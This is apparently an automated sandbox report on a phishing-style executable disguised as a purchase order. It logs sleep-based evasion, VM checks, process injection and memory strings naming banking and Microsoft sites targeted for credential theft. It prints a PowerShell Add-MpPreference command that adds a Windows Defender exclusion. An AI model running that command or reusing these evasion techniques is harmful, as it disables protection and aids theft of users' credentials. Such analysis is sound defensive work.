Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597854s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -595113s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -593735s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599829	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599687	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599569	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597854	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595113	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 593735	Jump to behavior

Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3790108500.0000000000C77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1348947926.00000000007A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Memory written: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
